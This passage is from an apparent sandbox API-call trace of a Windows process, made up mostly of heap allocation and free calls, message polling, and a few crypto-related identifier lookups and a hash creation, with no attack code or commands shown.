dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.689] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0196.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0196.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.691] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0196.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0196.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0196.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0196.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0196.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0196.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0196.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0196.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0196.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0196.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0196.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0196.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.713] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0196.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.714] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.714] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0196.715] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0196.715] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0196.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.716] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.716] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.716] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0196.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0196.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.717] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0196.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0196.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0196.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0196.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.718] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.718] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0196.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0196.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.719] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0196.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 